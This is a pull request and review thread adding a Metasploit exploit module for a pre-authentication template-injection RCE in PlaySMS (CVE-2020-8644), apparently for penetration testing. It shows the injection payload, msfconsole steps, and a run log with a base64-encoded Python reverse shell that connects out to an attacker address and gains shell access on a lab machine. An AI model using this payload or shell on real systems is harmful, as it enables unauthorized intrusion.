### PR TITLE
Playsms pre auth rce

### PR DESCRIPTION
**Pull request by touhidshaikh**
## Description
This module exploits a Preauth Server-Side Template Injection leads remote code execution vulnerability in PlaySMS Before Version 1.4.3.This issue is caused by Double processes a server-side template by Custom PHP Template system called 'TPL'.which is used in PlaySMS template engine location src/Playsms/Tpl.php:_compile(). When Attacker supply username with malicious payload and submit. This malicious payload first process by TPL and save value in current template after this value goes for the second process which result code execution.

The TPL(https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection

## Vulnerable Application 
Available at [Source Forge](https://sourceforge.net/projects/playsms/files/playsms/Version%201.4.2/playsms-1.4.2.tar.gz/download)

### Vulnerable Application Installation Setup.
 1. Download Application
 2. Extract : `tar -xvf playsms-1.4.2.tar.gz`
 3. Move In WebDirectory : `mv playsms-1.4.2/web/* /var/www/html/`
 4. make config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
 5. Change Owner : `chown -R www-data:www-data /var/www/html/`
 6. Set DB creds in config.php File. And dump playsms-1.4.2/db/playsms.sql in your playsms database.
 7. Now Visit : http://localhost/

## Verification Steps

 1. Install the application (Tested on HactheBox Frolic Machine)
 2. Start msfconsole
 3. Do: `use exploit/linux/http/playsms_pre_auth_rce`
 4. Do: `set rport <port>`
 5. Do: `set rhost <ip>`
 6. Do: `set targeturi /playsms`
 7. Do: `check`
```
[*] 10.10.10.111:9999 - The target appears to be vulnerable.
```
 10. Do: `set lport <port>`
 11. Do: `set lhost <ip>`
 12. Do: `run`
 13. You should get a shell.

### Playsms on Ubuntu Linux
```
msf5 exploit(linux/http/playsms_pre_auth_rce) > set verbose true
msf5 exploit(linux/http/playsms_pre_auth_rce) > run 
[+] python -c "exec('aW1wb3J0IHNvY2tldCAgICAgICwgICAgICAgc3VicHJvY2VzcyAgICAgICwgICAgICAgb3MgICAgICAgOyAgaG9zdD0iMTAuMTAuMTQuMjYiICAgICAgIDsgIHBvcnQ9ODA4MCAgICAgICA7ICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICAsICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICAgOyAgcy5jb25uZWN0KChob3N0ICAgICAgLCAgICAgICBwb3J0KSkgICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICAgLCAgICAgICAwKSAgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAsICAgICAgIDEpICAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICwgICAgICAgMikgICAgICAgOyAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp'.decode('base64'))"
[*] Started reverse TCP handler on 10.10.14.26:8080 
[+] X-CSRF-Token for login : 6724a9cdb72eccdf7a7456309053eadd
[*] Trying to Send Payload in Username Field ......
[+] Payload successfully Sent
[*] Cookies here : PHPSESSID=bodmgesqnfkrjtbhr3nohui0e2;
[*] Command shell session 1 opened (10.10.14.26:8080 -> 10.10.10.111:44564) at 2020-03-12 18:10:37 +0530
id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux frolic 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:22:43 UTC 2018 i686 athlon i686 GNU/Linux


```

### CODE REVIEW

File: modules/exploits/linux/http/playsms_pre_auth_rce.rb [hunk 1]
```diff
@@ -0,0 +1,154 @@
...
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'python'
+            }
+        },
+        'Targets' =>
+          [
+            [ 'PlaySMS Before 1.4.3', { } ],
+          ],
+        'DefaultTarget'  => 0,
+        'DisclosureDate' => 'Feb 05 2020'))
```
Comment (adfoster-r7) [inline modules/exploits/linux/http/playsms_pre_auth_rce.rb]: Hey - thanks for the PR :+1: There's some formatting issues in this file - would you mind running Rubocop on it? That's our automated code quality tool. You should be able to run it with:

```
rubocop -a modules/exploits/linux/http/playsms_pre_auth_rce.rb
```

Let me know if you have any issues

Comment (touhidshaikh) [reply modules/exploits/linux/http/playsms_pre_auth_rce.rb]: Thank You. 
 I guess Everything is fixed now.  :+1:

File: modules/exploits/linux/http/playsms_pre_auth_rce.rb [hunk 2]
```diff
@@ -0,0 +1,159 @@
...
+    /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
+    vprint_good("X-CSRF-Token for login : #{csrf}")
+
+    cookies = res.get_cookies
+
+    vprint_status('Trying to Send Payload in Username Field ......')
+
+    # Encoded in base64 to avoid HTML TAGS which is filter by Application.
+    evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64 -d |sh`}}"
```
Comment (smcintyre-r7) [inline modules/exploits/linux/http/playsms_pre_auth_rce.rb]: The way this is getting executed is yielding a session, then after a minute or two, the session is dying. I believe this is due to the inherent timeouts imposed on the PHP [shell_exec](https://www.php.net/manual/en/function.shell-exec.php) function. This really needs a solution to ensure that the session is not killed by some timeout after it's established. I spent a little time experimenting with `exec` and `popen` with no luck.

**Review by smcintyre-r7 — CHANGES_REQUESTED** [review]

File: modules/exploits/linux/http/playsms_pre_auth_rce.rb (hunk 2 above)
Comment (touhidshaikh) [reply modules/exploits/linux/http/playsms_pre_auth_rce.rb]: actually playsms filter all special character like ```', ", <, > ``` etc from preventing to XSS. that's y I am using base64 encoding.

File: modules/exploits/linux/http/playsms_pre_auth_rce.rb [hunk 3]
```diff
@@ -0,0 +1,159 @@
...
+            },
+        'Privileged' => false,
+        'Platform' => %w[unix linux],
+        'Arch' => ARCH_CMD,
+        'Payload' =>
+          {
+            'Compat' =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'python'
```
[the remark this answers is not in the document]
Comment (touhidshaikh) [reply modules/exploits/linux/http/playsms_pre_auth_rce.rb]: already working on this .. :)

File: modules/exploits/linux/http/playsms_pre_auth_rce.rb (hunk 2 above)
Comment (smcintyre-r7) [reply modules/exploits/linux/http/playsms_pre_auth_rce.rb]: I'm not commenting on the characters exactly. I'm saying that the *way* that the OS command is invoked through PHP is causing the subprocess in which the OS command / payload is executing to be terminated by PHP after a couple of minutes. There's got to be a way to run the OS command in a way that PHP does not kill the process, perhaps through some ability to `fork` it into the background.

File: modules/exploits/linux/http/playsms_pre_auth_rce.rb [hunk 4]
```diff
@@ -0,0 +1,159 @@
...
+        'References' =>
+            [
+              ['CVE', '2020-8644'],
+              ['URL', 'https://www.youtube.com/watch?v=zu-bwoAtTrc'],
+              ['URL', 'https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/']
+            ],
+        'DefaultOptions' =>
+            {
+              'SSL' => false,
+              'PAYLOAD' => 'cmd/unix/reverse_python'
```
Comment (adfoster-r7) [inline modules/exploits/linux/http/playsms_pre_auth_rce.rb]: Hey; I'm still new to metasploit, but am I right in saying that not all machines will have python installed?
If so, would choosing a PHP payload as the default be a good solution here?

```suggestion
              'PAYLOAD' => 'cmd/unix/reverse_php_ssl'
```

**Comment by smcintyre-r7** [comment]
Alright I tested this again. First, moving to the PHP architecture is good way to go. We know PHP will be on the system and (as you noted) it makes the module cross-platform.

Couple of things though:
- [ ] If you stick with PHP, then the module should be moved from `exploits/linux` to `exploits/multi`.
- [ ] The PHP payloads aren't working for me. I tried 4 combinations `php/meterpreter/(bind|reverse)_tcp` and `php/(bind|reverse)_php`.

I'm not really sure why the payloads aren't working. I reverted back to the previous commit to ensure my setup was still vulnerable so I know it's not that. FYI, I'm using a LAMP stack VM from Bitnami for testing.

**Comment by wvu-r7** [comment]
I have fixed the PHP payload and moved the module to `unix/webapp`.

**Comment by wvu-r7** [comment]
I believe the outstanding issues have now been addressed.

**Comment by smcintyre-r7** [comment]
Merged after a successful test! Also confirmed the meterpreter session was saying open :tada: 

Made one more round of minor changes in bd835e8f2d30ea08026f67d6663deef54933f932 where I moved the module to be with the other PlaySMS exploits and renamed it to more clearly reflect the nature of the vulnerability.

Thanks everyone!

**Comment by smcintyre-r7** [comment]
# Release Notes
This adds an unauthenticated RCE exploit for PlaySMS that leverages a flaw in `index.php` that can allow code to be injected into the template engine.

**Pull request merged**